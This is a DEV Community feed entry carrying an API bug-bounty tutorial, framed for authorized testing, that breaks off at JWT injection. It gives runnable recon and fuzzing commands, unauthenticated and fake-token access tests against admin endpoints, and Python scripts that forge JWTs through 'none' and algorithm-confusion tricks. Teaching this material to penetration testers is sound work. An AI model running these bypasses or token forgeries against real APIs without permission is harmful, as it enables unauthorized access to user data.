The latest articles on DEV Community by Md Hehedi Hasan (@securitytalent). https://dev.to/securitytalent https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1162096%2F030badce-acb7-418e-b378-d2b50cfd0981.png https://dev.to/securitytalent en Md Hehedi Hasan Sat, 13 Jun 2026 16:08:06 +0000 https://dev.to/securitytalent/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation-db2 https://dev.to/securitytalent/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation-db2 <blockquote> <p><strong>Authorization:</strong> This guide is for authorized penetration testing and bug bounty hunting only. All techniques should be performed against targets you have explicit written permission to test.</p> </blockquote> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxq3foz9ac7qujyywwdn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxq3foz9ac7qujyywwdn.png" alt=" "></a></p> <h2> Table of Contents </h2> <ol> <li>Phase 1: Surface Reconnaissance</li> <li>Phase 2: API Fingerprinting &amp; Documentation Extraction</li> <li>Phase 3: Authentication &amp; Authorization Bypass</li> <li>Phase 4: Injection Attacks on APIs</li> <li>Phase 5: GraphQL-Specific Attacks</li> <li>Phase 6: Rate Limit Testing &amp; Business Logic Abuse</li> <li>Phase 7: Automation Pipeline</li> <li>Phase 8: Exploit Chaining</li> <li>Reporting Template</li> <li>OWASP API Security Top 10 Reference</li> <li>Tools Cheatsheet</li> </ol> <h2> Phase 1: Surface Reconnaissance — Finding the Attack Surface </h2> <h3> 1.1 Passive Reconnaissance </h3> <h4> Wayback Machine &amp; Archive Analysis </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Using gau (GetAllUrls) — passive URL gathering</span> gau <span class="nt">--subs</span> target.com | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">json|</span><span class="se">\.</span><span class="s2">xml|/api/|/v[0-9]/|/graphql|/rest/|/swagger|/docs"</span> <span class="o">&gt;</span> api_endpoints.txt <span class="c"># Waybackurls via waymore</span> waymore <span class="nt">-i</span> target.com <span class="nt">-mode</span> U <span class="nt">-o</span> U | <span class="nb">grep</span> <span class="nt">-i</span> api <span class="c"># Using waybackurls</span> waybackurls target.com | <span class="nb">grep</span> <span class="nt">-iE</span> <span class="s2">"api|rest|graphql|swagger|v[0-9]"</span> | <span class="nb">sort</span> <span class="nt">-u</span> </code></pre> </div> <h4> Google Dorking for Exposed APIs </h4> <div class="highlight js-code-highlight"> <pre class="highlight conf"><code><span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="n">inurl</span>:<span class="s2">"/api/"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="n">inurl</span>:<span class="s2">"/v1/"</span> | <span class="n">inurl</span>:<span class="s2">"/v2/"</span> | <span class="n">inurl</span>:<span class="s2">"/v3/"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="n">intitle</span>:<span class="s2">"Swagger UI"</span> | <span class="n">intitle</span>:<span class="s2">"API Documentation"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="n">intitle</span>:<span class="s2">"index of"</span> <span class="s2">"api"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="n">ext</span>:<span class="n">json</span> <span class="s2">"swagger"</span> | <span class="n">ext</span>:<span class="n">yaml</span> <span class="s2">"openapi"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="s2">"api_key"</span> | <span class="s2">"api-key"</span> | <span class="s2">"apikey"</span> <span class="n">filetype</span>:<span class="n">txt</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="n">inurl</span>:<span class="s2">"/graphql"</span> | <span class="n">inurl</span>:<span class="s2">"/graphiql"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="n">inurl</span>:<span class="s2">"/rest/v1"</span> | <span class="n">inurl</span>:<span class="s2">"/rest/v2"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="s2">"Access-Control-Allow-Origin: *"</span> <span class="n">site</span>:<span class="n">target</span>.<span class="n">com</span> <span class="s2">"X-Powered-By:"</span> <span class="s2">"Express"</span> <span class="n">intitle</span>:<span class="s2">"API"</span> </code></pre> </div> <h4> Certificate Transparency Logs </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># crt.sh — find subdomains with API-related names</span> curl <span class="nt">-s</span> <span class="s2">"https://crt.sh/?q=%25.target.com&amp;output=json"</span> | jq <span class="nt">-r</span> <span class="s1">'.[].name_value'</span> | <span class="nb">sort</span> <span class="nt">-u</span> | <span class="nb">grep</span> <span class="nt">-iE</span> <span class="s2">"api|dev|staging|internal|gateway|admin|backend|sandbox|uat|edge|cdn|test|beta|v1|v2|v3|ws|websocket"</span> <span class="c"># Using certspotter</span> curl <span class="nt">-s</span> <span class="s2">"https://certspotter.com/api/v1/issuances?domain=target.com&amp;include_subdomains=true&amp;expand=dns_names"</span> | jq <span class="nt">-r</span> <span class="s1">'.[].dns_names[]'</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="c"># Using censys (requires API key)</span> <span class="c"># censys search "target.com" -f "parsed.names" | grep -i api</span> </code></pre> </div> <h4> Mobile App Reverse Engineering </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Android — decompile APK</span> apktool d app.apk <span class="nt">-o</span> decompiled <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"https</span><span class="se">\?</span><span class="s2">://"</span> decompiled/ <span class="nt">--include</span><span class="o">=</span><span class="s2">"*.smali"</span> <span class="nt">--include</span><span class="o">=</span><span class="s2">"*.xml"</span> <span class="nt">--include</span><span class="o">=</span><span class="s2">"*.json"</span> | <span class="nb">grep</span> <span class="nt">-i</span> api | <span class="nb">sort</span> <span class="nt">-u</span> <span class="c"># Android — using jadx for better decompilation</span> jadx app.apk <span class="nt">-d</span> jadx_output <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"https</span><span class="se">\?</span><span class="s2">://"</span> jadx_output/ <span class="nt">--include</span><span class="o">=</span><span class="s2">"*.java"</span> | <span class="nb">grep</span> <span class="nt">-iE</span> <span class="s2">"api|rest|graphql"</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="c"># iOS — using objection for dynamic analysis</span> objection <span class="nt">--gadget</span> <span class="s2">"com.target.app"</span> explore <span class="c"># inside objection:</span> <span class="c"># android hooking list classes | grep -i "api\|network\|request"</span> <span class="c"># ios hooking list classes | grep -i "api\|network\|request"</span> <span class="c"># iOS — static analysis with class-dump</span> class-dump <span class="nt">-H</span> Payload/Target.app/Target <span class="nt">-o</span> headers/ <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"https</span><span class="se">\?</span><span class="s2">://"</span> headers/ <span class="nt">--include</span><span class="o">=</span><span class="s2">"*.h"</span> | <span class="nb">grep</span> <span class="nt">-i</span> api </code></pre> </div> <h4> JavaScript Source Analysis </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Collect JS files</span> gau <span class="nt">--subs</span> target.com | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">js$"</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;</span> js_files.txt waybackurls target.com | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">js$"</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="o">&gt;&gt;</span> js_files.txt <span class="c"># Extract API endpoints from JS</span> <span class="nb">cat </span>js_files.txt | <span class="k">while </span><span class="nb">read </span>url<span class="p">;</span> <span class="k">do </span>curl <span class="nt">-s</span> <span class="s2">"</span><span class="nv">$url</span><span class="s2">"</span> | <span class="nb">grep</span> <span class="nt">-oP</span> <span class="s1">'["'</span><span class="s2">"'"</span><span class="s1">']https?://[^"'</span><span class="s2">"'"</span><span class="s1">']*api[^"'</span><span class="s2">"'"</span><span class="s1">']*'</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="k">done</span> <span class="c"># Using linkfinder</span> python3 linkfinder.py <span class="nt">-i</span> https://target.com/app.js <span class="nt">-o</span> cli | <span class="nb">grep </span>api <span class="c"># Using jsubfinder</span> jsubfinder search <span class="nt">-d</span> target.com | <span class="nb">grep</span> <span class="nt">-i</span> api </code></pre> </div> <h3> 1.2 Active Reconnaissance </h3> <h4> Subdomain Enumeration Focused on API Subdomains </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Subfinder + httpx</span> subfinder <span class="nt">-d</span> target.com <span class="nt">-all</span> <span class="nt">-silent</span> | httpx <span class="nt">-silent</span> <span class="nt">-ports</span> 80,443,8080,8443,9090,3000,5000,7000,8000 | <span class="nb">tee </span>live_subdomains.txt <span class="c"># Filter for API-related subdomains</span> <span class="nb">cat </span>live_subdomains.txt | <span class="nb">grep</span> <span class="nt">-iE</span> <span class="s2">"api|gateway|backend|internal|admin|dev|staging|uat|sandbox|edge|cdn|test|beta|stage|prod|corp|ops|services|service|ws|socket|webhook|cron|jobs|worker|queue|sync|async|data|analytics|metrics|monitor|status|health"</span> <span class="c"># Using amass for deeper enumeration</span> amass enum <span class="nt">-d</span> target.com <span class="nt">-o</span> amass_output.txt <span class="nb">cat </span>amass_output.txt | <span class="nb">grep</span> <span class="nt">-iE</span> <span class="s2">"api|gateway|internal|admin|dev"</span> | <span class="nb">sort</span> <span class="nt">-u</span> <span class="c"># DNS brute force with custom API subdomain wordlist</span> puredns bruteforce /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt target.com | <span class="nb">grep</span> <span class="nt">-iE</span> <span class="s2">"api|gateway|internal|admin|dev|staging|uat|sandbox|edge|cdn|test|beta|stage|prod|corp|ops"</span> </code></pre> </div> <h4> Directory / Endpoint Bruteforcing </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Common API paths</span> ffuf <span class="nt">-u</span> https://api.target.com/FUZZ <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/common-api-endpoints.txt <span class="nt">-mc</span> all <span class="nt">-fs</span> 0 <span class="nt">-fc</span> 404 <span class="c"># API version enumeration</span> ffuf <span class="nt">-u</span> https://api.target.com/FUZZ <span class="nt">-w</span> &lt;<span class="o">(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"v1</span><span class="se">\n</span><span class="s2">v2</span><span class="se">\n</span><span class="s2">v3</span><span class="se">\n</span><span class="s2">v4</span><span class="se">\n</span><span class="s2">v1.0</span><span class="se">\n</span><span class="s2">v2.0</span><span class="se">\n</span><span class="s2">latest</span><span class="se">\n</span><span class="s2">stable</span><span class="se">\n</span><span class="s2">alpha</span><span class="se">\n</span><span class="s2">beta</span><span class="se">\n</span><span class="s2">dev</span><span class="se">\n</span><span class="s2">staging</span><span class="se">\n</span><span class="s2">test"</span><span class="o">)</span> <span class="nt">-mc</span> 200,301,302,403,401 <span class="c"># GraphQL discovery</span> ffuf <span class="nt">-u</span> https://api.target.com/FUZZ <span class="nt">-w</span> &lt;<span class="o">(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"graphql</span><span class="se">\n</span><span class="s2">graph</span><span class="se">\n</span><span class="s2">graphiql</span><span class="se">\n</span><span class="s2">v1/graphql</span><span class="se">\n</span><span class="s2">v2/graphql</span><span class="se">\n</span><span class="s2">api/graphql</span><span class="se">\n</span><span class="s2">query</span><span class="se">\n</span><span class="s2">mutations</span><span class="se">\n</span><span class="s2">subscriptions</span><span class="se">\n</span><span class="s2">playground</span><span class="se">\n</span><span class="s2">graphql/console"</span><span class="o">)</span> <span class="nt">-mc</span> 200,301,302,403 <span class="c"># Swagger/OpenAPI docs</span> ffuf <span class="nt">-u</span> https://api.target.com/FUZZ <span class="nt">-w</span> &lt;<span class="o">(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"swagger.json</span><span class="se">\n</span><span class="s2">swagger.yaml</span><span class="se">\n</span><span class="s2">api-docs</span><span class="se">\n</span><span class="s2">openapi.json</span><span class="se">\n</span><span class="s2">openapi.yaml</span><span class="se">\n</span><span class="s2">docs</span><span class="se">\n</span><span class="s2">v2/swagger.json</span><span class="se">\n</span><span class="s2">v3/api-docs</span><span class="se">\n</span><span class="s2">/swagger-resources</span><span class="se">\n</span><span class="s2">/swagger-ui.html</span><span class="se">\n</span><span class="s2">/redoc</span><span class="se">\n</span><span class="s2">/docs/api</span><span class="se">\n</span><span class="s2">/api/documentation"</span><span class="o">)</span> <span class="nt">-mc</span> 200,301,302,403 <span class="c"># Recursive directory fuzzing on API endpoints</span> ffuf <span class="nt">-u</span> https://target.com/api/FUZZ <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/api-endpoints-resolvers.txt <span class="nt">-recursion</span> <span class="nt">-recursion-depth</span> 2 <span class="nt">-mc</span> all <span class="nt">-fc</span> 404 </code></pre> </div> <h4> Parameter Discovery </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Arjun — parameter discovery</span> arjun <span class="nt">-u</span> https://api.target.com/v1/users <span class="nt">--get</span> arjun <span class="nt">-u</span> https://api.target.com/v1/login <span class="nt">--post</span> <span class="c"># Paramspider</span> paramspider <span class="nt">-d</span> target.com <span class="nt">--subs</span> <span class="nt">--exclude</span> woff,css,js,png,svg,jpg <span class="c"># x8 — hidden parameter fuzzer (more thorough than Arjun)</span> x8 <span class="nt">-u</span> https://api.target.com/v1/users <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt <span class="c"># Custom parameter bruteforce with ffuf</span> ffuf <span class="nt">-u</span> https://api.target.com/v1/users?FUZZ<span class="o">=</span><span class="nb">test</span> <span class="se">\</span> <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-mc</span> all <span class="nt">-fc</span> 400,404 <span class="nt">-fs</span> 0 </code></pre> </div> <h2> Phase 2: API Fingerprinting &amp; Documentation Extraction </h2> <h3> 2.1 Identify API Type &amp; Protocol </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Check response headers for API identification</span> curl <span class="nt">-sI</span> https://api.target.com/v1/users <span class="c"># Look for:</span> <span class="c"># X-Powered-By: Express / ASP.NET / Flask / Django / etc.</span> <span class="c"># Server: nginx / apache / cloudflare / etc.</span> <span class="c"># Content-Type: application/json / application/xml / text/graphql</span> <span class="c"># Access-Control-Allow-Origin</span> <span class="c"># X-RateLimit-*</span> <span class="c"># X-API-Key-Required</span> <span class="c"># Check for RESTful patterns</span> curl <span class="nt">-s</span> https://api.target.com/v1/users | <span class="nb">head</span> <span class="nt">-50</span> curl <span class="nt">-s</span> https://api.target.com/v1/users/1 | <span class="nb">head</span> <span class="nt">-50</span> <span class="c"># Check for GraphQL</span> curl <span class="nt">-s</span> https://api.target.com/graphql <span class="nt">-X</span> POST <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="nt">-d</span> <span class="s1">'{"query":"{ __typename }"}'</span> <span class="c"># Check for SOAP</span> curl <span class="nt">-s</span> https://api.target.com/soap <span class="nt">-X</span> POST <span class="nt">-H</span> <span class="s2">"Content-Type: text/xml"</span> <span class="nt">-d</span> <span class="s1">'&lt;?xml version="1.0"?&gt;&lt;soap:Envelope&gt;&lt;soap:Body/&gt;&lt;/soap:Envelope&gt;'</span> <span class="c"># Check for gRPC (HTTP/2 required)</span> curl <span class="nt">-sI</span> <span class="nt">--http2</span> https://api.target.com:50051 <span class="c"># Check for WebSocket</span> curl <span class="nt">-sI</span> <span class="nt">-H</span> <span class="s2">"Upgrade: websocket"</span> <span class="nt">-H</span> <span class="s2">"Connection: Upgrade"</span> https://api.target.com/socket </code></pre> </div> <h3> 2.2 Extract Full API Documentation </h3> <h4> Swagger / OpenAPI Endpoints </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Common paths — comprehensive list</span> <span class="k">for </span>path <span class="k">in</span> <span class="se">\</span> /swagger.json <span class="se">\</span> /swagger.yaml <span class="se">\</span> /api/swagger.json <span class="se">\</span> /api/swagger.yaml <span class="se">\</span> /api/v1/swagger.json <span class="se">\</span> /api/v2/swagger.json <span class="se">\</span> /v1/swagger.json <span class="se">\</span> /v2/swagger.json <span class="se">\</span> /v3/swagger.json <span class="se">\</span> /swagger-resources <span class="se">\</span> /swagger-ui.html <span class="se">\</span> /api-docs <span class="se">\</span> /v2/api-docs <span class="se">\</span> /v3/api-docs <span class="se">\</span> /openapi.json <span class="se">\</span> /openapi.yaml <span class="se">\</span> /docs <span class="se">\</span> /redoc <span class="se">\</span> /api/documentation <span class="se">\</span> /documentation <span class="se">\</span> /api/docs <span class="se">\</span> /api/v1/docs <span class="se">\</span> /api/v2/docs <span class="se">\</span> /api/v3/docs<span class="p">;</span> <span class="k">do </span><span class="nv">status</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-o</span> /dev/null <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="s2">"https://api.target.com</span><span class="nv">$path</span><span class="s2">"</span><span class="si">)</span> <span class="nb">echo</span> <span class="s2">"</span><span class="nv">$status</span><span class="s2"> - https://api.target.com</span><span class="nv">$path</span><span class="s2">"</span> <span class="k">done</span> <span class="c"># Download and parse</span> curl <span class="nt">-s</span> https://api.target.com/swagger.json | jq <span class="s1">'.paths'</span> | <span class="nb">head</span> <span class="nt">-100</span> <span class="c"># Convert to Postman collection for testing</span> curl <span class="nt">-s</span> https://api.target.com/swagger.json | npx swagger-to-postman <span class="o">&gt;</span> collection.json <span class="c"># Extract all endpoints from OpenAPI spec</span> curl <span class="nt">-s</span> https://api.target.com/openapi.json | jq <span class="nt">-r</span> <span class="s1">'.paths | to_entries[] | .key as $path | .value | to_entries[] | "\(.key | ascii_upcase) \($path)"'</span> | <span class="nb">sort</span> </code></pre> </div> <h4> GraphQL Introspection </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Standard introspection query</span> curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"query": "{__schema{types{name fields{name type{name kind}}}}}"}'</span> <span class="c"># Full introspection query</span> curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{ "query": "query { __schema { types { name kind fields { name type { name kind ofType { name kind } } } } queryType { fields { name args { name type { name kind } } } } mutationType { fields { name args { name type { name kind } } } } } }" }'</span> | jq <span class="nb">.</span> <span class="c"># Using InQL (Burp extension or standalone)</span> python3 inql <span class="nt">-t</span> https://api.target.com/graphql <span class="nt">-d</span> <span class="c"># Using graphw00f for fingerprinting</span> graphw00f <span class="nt">-d</span> https://api.target.com/graphql <span class="c"># Using clairvoyance when introspection is disabled</span> clairvoyance https://api.target.com/graphql <span class="nt">-o</span> schema.json <span class="c"># Using GraphQLmap for interactive testing</span> python3 graphqlmap.py <span class="nt">-u</span> https://api.target.com/graphql </code></pre> </div> <h3> 2.3 HTTP Method Fuzzing </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Fuzz all methods on discovered endpoints</span> <span class="k">for </span>method <span class="k">in </span>GET POST PUT PATCH DELETE OPTIONS HEAD TRACE CONNECT<span class="p">;</span> <span class="k">do </span><span class="nv">status</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-X</span> <span class="s2">"</span><span class="nv">$method</span><span class="s2">"</span> <span class="nt">-s</span> <span class="nt">-o</span> /dev/null <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="s2">"https://api.target.com/v1/users"</span><span class="si">)</span> <span class="nb">echo</span> <span class="s2">"</span><span class="nv">$status</span><span class="s2"> - </span><span class="nv">$method</span><span class="s2">"</span> <span class="k">done</span> <span class="c"># Automated with ffuf</span> ffuf <span class="nt">-u</span> https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-X</span> FUZZ <span class="se">\</span> <span class="nt">-w</span> &lt;<span class="o">(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"GET</span><span class="se">\n</span><span class="s2">POST</span><span class="se">\n</span><span class="s2">PUT</span><span class="se">\n</span><span class="s2">PATCH</span><span class="se">\n</span><span class="s2">DELETE</span><span class="se">\n</span><span class="s2">OPTIONS</span><span class="se">\n</span><span class="s2">HEAD</span><span class="se">\n</span><span class="s2">TRACE"</span><span class="o">)</span> <span class="se">\</span> <span class="nt">-mc</span> all <span class="nt">-fc</span> 404,405,400 <span class="c"># Check for CORS misconfigurations</span> curl <span class="nt">-sI</span> https://api.target.com/v1/users <span class="nt">-H</span> <span class="s2">"Origin: https://evil.com"</span> | <span class="nb">grep</span> <span class="nt">-i</span> <span class="s2">"access-control"</span> <span class="c"># OPTIONS method to see allowed methods</span> curl <span class="nt">-s</span> <span class="nt">-X</span> OPTIONS https://api.target.com/v1/users <span class="nt">-I</span> | <span class="nb">grep</span> <span class="nt">-i</span> allow </code></pre> </div> <h2> Phase 3: Authentication &amp; Authorization Bypass Techniques </h2> <h3> 3.1 Authentication Bypass Vectors </h3> <h4> Missing or Weak Auth on Hidden Endpoints </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Compare authenticated vs unauthenticated access</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> | <span class="nb">head</span> <span class="nt">-50</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="c"># No token — what happens?</span> <span class="c"># Test with empty token</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"Authorization: Bearer "</span> <span class="c"># Test with null token</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"Authorization: null"</span> <span class="c"># Test with arbitrary token</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"Authorization: Bearer test123"</span> <span class="c"># Test without auth header at all</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="c"># Test with different auth schemes</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"Authorization: Basic YWRtaW46YWRtaW4="</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"X-API-Key: admin"</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"API-Key: admin"</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="nt">-H</span> <span class="s2">"X-Token: admin"</span> </code></pre> </div> <h4> JWT Manipulation </h4> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span><span class="sh">"""</span><span class="s"> JWT manipulation toolkit for API testing </span><span class="sh">"""</span> <span class="kn">import</span> <span class="n">jwt</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">json</span> <span class="kn">import</span> <span class="n">base64</span> <span class="c1"># Technique 1: Set algorithm to 'none' </span><span class="k">def</span> <span class="nf">jwt_none_bypass</span><span class="p">(</span><span class="n">payload</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Set alg to </span><span class="sh">'</span><span class="s">none</span><span class="sh">'</span><span class="s"> — works on poorly validated JWTs</span><span class="sh">"""</span> <span class="n">headers_variants</span> <span class="o">=</span> <span class="p">[</span> <span class="p">{</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">none</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">None</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">NONE</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">nOnE</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">none</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">kid</span><span class="sh">"</span><span class="p">:</span> <span class="sh">""</span><span class="p">},</span> <span class="p">]</span> <span class="n">tokens</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">header</span> <span class="ow">in</span> <span class="n">headers_variants</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="n">token</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="sh">""</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">none</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">header</span><span class="p">)</span> <span class="n">tokens</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> <span class="k">except</span><span class="p">:</span> <span class="c1"># Some libraries don't allow 'none' </span> <span class="c1"># Manual encoding fallback </span> <span class="n">encoded_header</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span><span class="n">json</span><span class="p">.</span><span class="nf">dumps</span><span class="p">(</span><span class="n">header</span><span class="p">).</span><span class="nf">encode</span><span class="p">()).</span><span class="nf">rstrip</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">=</span><span class="sh">'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span> <span class="n">encoded_payload</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span><span class="n">json</span><span class="p">.</span><span class="nf">dumps</span><span class="p">(</span><span class="n">payload</span><span class="p">).</span><span class="nf">encode</span><span class="p">()).</span><span class="nf">rstrip</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">=</span><span class="sh">'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span> <span class="n">token</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">encoded_header</span><span class="si">}</span><span class="s">.</span><span class="si">{</span><span class="n">encoded_payload</span><span class="si">}</span><span class="s">.</span><span class="sh">"</span> <span class="n">tokens</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> <span class="k">return</span> <span class="n">tokens</span> <span class="c1"># Technique 2: RS256 → HS256 algorithm confusion </span><span class="k">def</span> <span class="nf">jwt_alg_confusion</span><span class="p">(</span><span class="n">public_key_path</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="sh">"""</span><span class="s"> If the server uses RS256 but accepts HS256, sign with the PUBLIC key (which is known) as HMAC secret </span><span class="sh">"""</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">public_key_path</span><span class="p">,</span> <span class="sh">"</span><span class="s">r</span><span class="sh">"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">public_key</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="nf">read</span><span class="p">()</span> <span class="n">forged</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">public_key</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">forged</span> <span class="c1"># Technique 3: JWK injection 